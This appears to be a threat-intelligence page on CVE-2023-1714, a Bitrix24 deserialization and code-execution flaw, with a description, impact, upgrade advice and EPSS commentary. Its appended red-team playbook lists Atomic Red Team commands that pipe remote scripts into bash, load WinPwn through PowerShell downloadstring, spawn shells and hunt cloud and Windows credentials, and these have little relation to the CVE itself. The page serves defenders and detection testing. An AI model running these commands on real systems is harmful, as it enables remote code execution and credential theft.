CVE-2023-1714
Overview
This vulnerability is a deserialization flaw combined with unsafe variable extraction in the user options handling component of Bitrix24, specifically within the file bitrix/modules/main/classes/general/user_options.php. The root cause lies in the improper handling of user-supplied input that allows manipulation of PHP variables, enabling injection of arbitrary content into existing PHP files or exploitation via PHAR deserialization. The affected component is the user options management subsystem in Bitrix24 version 22.0.300.
Vulnerability Description
Unsafe variable extraction in bitrix/modules/main/classes/general/user_options.php in Bitrix24 22.0.300 allows remote authenticated attackers to execute arbitrary code via (1) appending arbitrary content to existing PHP files or (2) PHAR deserialization.
Impact
An attacker with valid credentials can execute arbitrary code on the server by injecting malicious PHP content or abusing PHAR deserialization, leading to full system compromise. This requires network access and authenticated user privileges (PR:L), with no user interaction needed (UI:N). Successful exploitation can result in data breaches, unauthorized access, and service disruption, as indicated by the CVSS vector with high confidentiality, integrity, and availability impacts (C:H/I:H/A:H).
Solution
To remediate this vulnerability, upgrade Bitrix24 to a version later than 22.0.300 as recommended in the advisory at https://starlabs.sg/advisories/23/23-1714/. The vendor has addressed the unsafe variable extraction and deserialization issues in subsequent releases. Follow the vendor's patch installation instructions outlined in the referenced advisory to ensure complete mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in Bitrix24 version 22.0.300 revolves around unsafe variable extraction within the user_options.php file. This flaw allows remote authenticated attackers to execute arbitrary code on the server. The root cause lies in the improper handling of user-supplied input, which can lead to the manipulation of existing PHP files or the exploitation of PHAR deserialization. By appending malicious content to PHP files, an attacker can introduce harmful scripts that may compromise the integrity of the application and the underlying server. Moreover, the deserialization of untrusted PHAR archives can lead to the execution of arbitrary code, further amplifying the risk associated with this vulnerability.
Attack vectors exploiting this vulnerability are particularly concerning due to their accessibility. An authenticated user, who may have legitimate access to the Bitrix24 platform, can leverage this flaw to perform unauthorized actions. For instance, an attacker could craft a request that appends malicious PHP code to a file that is executed by the web server. This could be done through a web interface or API that fails to validate user input adequately. Additionally, the exploitation of PHAR deserialization allows attackers to inject payloads that can be executed in the context of the web server, potentially leading to full system compromise. Such exploitation could occur without the need for elevated privileges, making it a significant threat to organizations relying on this platform.
The real-world impact of this vulnerability can be severe, especially for businesses that utilize Bitrix24 for critical operations. The potential for arbitrary code execution means that attackers could gain control over sensitive data, disrupt services, or even deploy ransomware. The business risk is compounded by the fact that many organizations may not have robust monitoring or incident response mechanisms in place, which could lead to prolonged exposure and damage. Furthermore, the reputational harm of a successful attack could deter customers and partners, leading to financial losses and diminished trust in the organization’s ability to safeguard its assets.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regular security assessments, including code reviews and penetration testing, can help identify and remediate vulnerabilities before they are exploited. Additionally, organizations should ensure that their Bitrix24 installations are updated to the latest versions, as vendors often release patches that address known vulnerabilities. Monitoring for unusual activity, such as unexpected changes to PHP files or unauthorized access attempts, can also provide early warning signs of exploitation. Employing web application firewalls (WAFs) can further bolster defenses by filtering out malicious requests before they reach the application.
In conclusion, the vulnerability in Bitrix24 presents a significant threat due to its potential for arbitrary code execution through unsafe variable extraction. The ease of exploitation by authenticated users, coupled with the severe implications for business operations, underscores the necessity for proactive security measures. By prioritizing detection and mitigation strategies, organizations can better protect themselves against the risks associated with this vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has detected a modest but consistent increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-1714, reflecting a growing likelihood of exploitation attempts in the near term. Although no new exploit techniques or proof-of-concept code have surfaced, this upward trend in EPSS suggests heightened attacker interest or improved reconnaissance capabilities targeting Bitrix24 instances vulnerable to unsafe variable extraction. For defenders, this signals an elevated risk environment where opportunistic threat actors may be preparing to leverage the vulnerability more aggressively, potentially increasing the frequency of attempted intrusions. While the overall threat level remains high due to the vulnerability’s inherent severity and ease of exploitation by authenticated users, the incremental rise in EPSS underscores the need for continued vigilance and monitoring of exploitation indicators within enterprise environments hosting Bitrix24.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Bitrix24 | Bitrix24 | 22.0.300 |
cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
2 eventsSighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-1714 |
| starlabs.sg |
GitHub CVE
third-party-advisory
|
https://starlabs.sg/advisories/23/23-1714/ |